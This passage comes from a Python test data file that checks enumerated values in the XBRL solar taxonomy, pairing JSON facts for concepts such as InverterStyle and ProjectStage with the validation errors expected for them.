"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "MicroInverter",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:inverterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:inverterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Three Phase WYE",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:inverterPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:inverterPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Partial Funding",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:investmentStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:investmentStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Fund Level",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mORLevelItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mORLevelItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "BiFacial",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Portrait",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleOrientationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleOrientationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Multi-C-Si",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleTechnologyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleTechnologyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Ballasted",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mountingItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mountingItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Owner Occupied",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:occupancyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:occupancyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Attached",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:optimizerTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:optimizerTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Workers Compensation Insurer",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:participantItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:participantItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Incomplete",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:preventiveMaintenanceTaskStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:preventiveMaintenanceTaskStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Solar Plus Storage",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectAssetTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectAssetTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Community Solar",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectClassItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectClassItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Virtual Net Meter",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectInterconnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectInterconnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Early Construction",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "In Operation",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectStageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectStageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Not Submitted",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "EWG",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryFacilityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryFacilityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Letter of Credit",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveCollateralItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveCollateralItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Maintenance",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveUseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveUseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofSlopeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofSlopeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Lease",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "value is not legal for type solar-types:siteControlItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "value is not legal for type solar-types:siteControlItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Agricultural",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:solarSystemCharacterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:solarSystemCharacterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Insufficient",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:sparePartsStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:sparePartsStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Islanded",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemAvailabilityModeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemAvailabilityModeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Communication Failure",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemOperationalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemOperationalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Pro Forma",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:titlePolicyInsuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:titlePolicyInsuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Azimuth Axis Tracking",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:trackerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:trackerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:zoningPermitPropertyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:zoningPermitPropertyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
]
]
JSON_HEADER = """
{
"documentType": "http://www.xbrl.org/WGWD/YYYY-MM-DD/xbrl-json",
"prefixes": {
"xbrl": "http://www.xbrl.org/WGWD/YYYY-MM-DD/oim",
"solar": "http://xbrl.us/Solar/v1.1/2018-02-09/solar",
"us-gaap": "http://fasb.org/us-gaap/2017-01-31",
"iso4217": "http://www.xbrl.org/2003/iso4217",
"SI": "http://www.xbrl.org/2009/utr"
},
"dtsReferences": [
{
"type": "schema",
"href": "https://raw.githubusercontent.com/xbrlus/solar/v1.2/core/solar_all_2018-03-31_r01.xsd"
}
],
"facts": [
"""
JSON_FOOTER = """
]
}
"""
